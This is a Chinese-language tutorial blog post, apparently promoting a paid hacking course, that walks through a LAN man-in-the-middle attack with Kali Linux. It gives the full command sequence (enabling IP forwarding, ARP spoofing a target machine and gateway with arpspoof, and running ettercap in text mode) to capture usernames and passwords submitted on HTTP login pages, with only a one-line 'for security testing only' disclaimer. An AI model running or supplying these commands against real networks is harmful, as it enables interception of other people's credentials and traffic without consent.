【kali是如何通过ettercap中间人攻击嗅探目标上网登录密码的?】
近日,我一直在写关于局域网中间人攻击的小白教程,从最开始的ARP缓存攻击,实现截获局域网下任何电脑设备的上网记录;到DNS域名攻击,实现替换他人正常访问的网页,重定向到山寨的钓鱼网页;后面又讲了使用kali的ettercap中间人套件,实时截获目标浏览时的图片(以上课程仅用于安全为目的测试使用,禁止用于不当用途!),学员反映学后很有收获,甚至问我还能不能再讲解下关于网页HTTP/HTTPS的攻击,好的,首先在这里提前透露下吧,另外完整的中间人流量攻击教程,大家可以点击>>头条专栏获取。
kali既然集成了ettercap,再加上arpspoof,一般情况下几个命令就能搞定HTTP登录页面的用户名和密码的获取。
1、开启kali的路由转发
echo 1 > /proc/sys/net/ipv4/ip_forward
没有转发,就会出现拒绝服务器
2、开启ARP欺骗
arpspoof -i eth0(网卡) -t 192.168.31.6(目标IP) 192.168.31.1(网关)
将kali伪装成网关,并欺骗win10
3、ettercap命令行模式嗅探
ettercap -Tq -i eth0
-Tq是指文本模式,指输出嗅探到的url和用户名密码、IP!
理想的状态下,192.168.31.6这台win10靶机如果在HTTP类型的网页下登录时,ettercap就会自动截获登录时提交的用户名和密码。
原理:为什么HTTP类型网页中的登录密码可以被嗅探截获呢?首先你要明白HTTP协议下的网页,任何数据都是不被加密的,明文传输你提交到服务器的登录凭证,此时kali作为中间人嗅探到的当然是没有加密的登陆口令了!既然你明白了HTTP,那么HTTPS也就不再扑朔迷离,简单地说网页如果使用了HTTPS协议,那就是将这个网页上的数据传输做了加密,关于HTTPS下登录口令的获取,下节课再详谈!
更多数据流量的中间人攻击、以及完整的网络安全、白帽黑客技术,可以点击>>头条专栏>>前往我的视频教程《白帽黑客kali渗透实战指南》。
关注@小白嘿客 ,从新手小白到白帽黑客!